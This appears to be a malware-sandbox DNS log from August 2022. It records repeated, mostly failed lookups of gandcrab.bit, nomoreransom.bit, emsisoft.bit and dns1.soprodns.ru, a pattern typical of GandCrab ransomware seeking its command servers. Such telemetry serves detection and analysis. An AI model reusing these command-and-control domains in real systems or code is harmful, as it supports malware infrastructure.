Aug 31, 2022 23:49:08.376708031 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.397835970 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:08.418164968 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.440345049 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:08.824318886 CEST	8.8.8.8	192.168.2.6	0x2ef	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:13.306567907 CEST	8.8.8.8	192.168.2.6	0x9ae2	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:13.364543915 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:13.386758089 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:13.407160044 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:13.427547932 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:13.445738077 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:14.049354076 CEST	8.8.8.8	192.168.2.6	0x9ae2	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:15.732141018 CEST	8.8.8.8	192.168.2.6	0xf69c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:15.786143064 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:15.810261011 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:15.845424891 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:15.871382952 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:15.897437096 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:16.308988094 CEST	8.8.8.8	192.168.2.6	0xf69c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:17.240441084 CEST	8.8.8.8	192.168.2.6	0xaba4	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:17.314428091 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:17.335490942 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:17.354706049 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:17.375117064 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:17.394150019 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:19.552881956 CEST	8.8.8.8	192.168.2.6	0x3c13	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.624495029 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:19.646193027 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.666341066 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:19.686774969 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.706923962 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:19.966856956 CEST	8.8.8.8	192.168.2.6	0x3c13	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:21.322283030 CEST	8.8.8.8	192.168.2.6	0x1b2c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:21.388284922 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:21.409245014 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:21.428335905 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:21.460988045 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:21.481684923 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:22.802742958 CEST	8.8.8.8	192.168.2.6	0xf422	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.845546007 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:22.864109993 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.885181904 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:22.905694008 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.924313068 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:24.794177055 CEST	8.8.8.8	192.168.2.6	0x944e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:24.862725973 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:24.881535053 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:24.900017977 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:24.918819904 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:24.944628000 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:26.704699039 CEST	8.8.8.8	192.168.2.6	0x6a3c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:26.762280941 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:26.786171913 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:26.815588951 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:26.840948105 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:26.868755102 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:33.918472052 CEST	8.8.8.8	192.168.2.6	0x778b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:33.965091944 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:33.985773087 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:34.008980036 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:34.029289961 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:34.047578096 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:34.840379000 CEST	8.8.8.8	192.168.2.6	0x778b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:37.368525028 CEST	8.8.8.8	192.168.2.6	0xa02c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:37.434192896 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:37.455080986 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:37.479908943 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:37.513475895 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:37.546905994 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:37.804033995 CEST	8.8.8.8	192.168.2.6	0xa02c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:39.158519983 CEST	8.8.8.8	192.168.2.6	0x9841	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:39.209886074 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:39.228986025 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:39.250422955 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:39.270978928 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:39.291903973 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:39.578844070 CEST	8.8.8.8	192.168.2.6	0xa02c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:42.803582907 CEST	8.8.8.8	192.168.2.6	0xb43c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:42.849625111 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:42.870042086 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:42.890347004 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:42.910130978 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:42.930283070 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:43.727183104 CEST	8.8.8.8	192.168.2.6	0xb43c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:44.304563046 CEST	8.8.8.8	192.168.2.6	0xb43c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:46.151169062 CEST	8.8.8.8	192.168.2.6	0xa38b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:46.186392069 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:46.206867933 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:46.227328062 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:46.245661020 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:46.263768911 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:47.143296003 CEST	8.8.8.8	192.168.2.6	0xa38b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:48.946257114 CEST	8.8.8.8	192.168.2.6	0xa38b	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:49.671741962 CEST	8.8.8.8	192.168.2.6	0x888a	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:50.028801918 CEST	8.8.8.8	192.168.2.6	0x888a	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:50.072125912 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:50.094736099 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:50.160806894 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:50.185210943 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:50.206547022 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:52.308414936 CEST	8.8.8.8	192.168.2.6	0x888a	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:53.300184965 CEST	8.8.8.8	192.168.2.6	0xe105	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:53.328352928 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:53.353754044 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:53.372015953 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:53.390347004 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:53.411127090 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:54.282331944 CEST	8.8.8.8	192.168.2.6	0x2c41	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.312721014 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:54.346045017 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.369218111 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:54.389324903 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.415669918 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:54.786828041 CEST	8.8.8.8	192.168.2.6	0x2fb6	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.827580929 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:54.848042965 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.871623039 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:54.893619061 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.917089939 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:56.991584063 CEST	8.8.8.8	192.168.2.6	0xe3e7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.019478083 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:57.038048983 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.058454990 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:57.078458071 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.096430063 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:57.489593983 CEST	8.8.8.8	192.168.2.6	0x54e0	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.535823107 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:57.556433916 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.581238985 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:57.601391077 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.621717930 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:59.038297892 CEST	8.8.8.8	192.168.2.6	0x3737	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.064886093 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:59.085707903 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.107444048 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:59.127703905 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.148261070 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:59.514354944 CEST	8.8.8.8	192.168.2.6	0x3737	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.090209007 CEST	8.8.8.8	192.168.2.6	0x6ea0	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.166991949 CEST	8.8.8.8	192.168.2.6	0x6ea0	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.195605040 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:01.216135979 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.236490965 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:01.255160093 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.281599998 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:01.376256943 CEST	8.8.8.8	192.168.2.6	0xe3e7	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.165421963 CEST	8.8.8.8	192.168.2.6	0xe543	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.239063978 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:03.259295940 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.279720068 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:03.343146086 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.361332893 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:03.789190054 CEST	8.8.8.8	192.168.2.6	0xe543	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.843403101 CEST	8.8.8.8	192.168.2.6	0x51e7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.876193047 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:03.896852016 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.916883945 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:03.934696913 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.954763889 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:04.441500902 CEST	8.8.8.8	192.168.2.6	0xf3aa	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:04.485769033 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:04.504255056 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:04.522697926 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:04.542658091 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:04.562457085 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:06.137584925 CEST	8.8.8.8	192.168.2.6	0xa538	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:06.176224947 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:06.194561005 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:06.215605021 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:06.235455036 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:06.255532980 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:07.172410965 CEST	8.8.8.8	192.168.2.6	0xa538	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:07.863023043 CEST	8.8.8.8	192.168.2.6	0xd5a5	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:07.908613920 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:07.947222948 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:07.987987041 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:08.082803011 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:08.104629993 CEST	8.8.8.8	192.168.2.6	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:08.879440069 CEST	8.8.8.8	192.168.2.6	0xd5a5	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:10.707927942 CEST	8.8.8.8	192.168.2.6	0x9165	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:10.771631002 CEST	8.8.8.8	192.168.2.6	0x9165	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:11.704840899 CEST	8.8.8.8	192.168.2.6	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:11.759860039 CEST	8.8.8.8	192.168.2.6	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:11.805135965 CEST	8.8.8.8	192.168.2.6	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:11.825198889 CEST	8.8.8.8	192.168.2.6	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
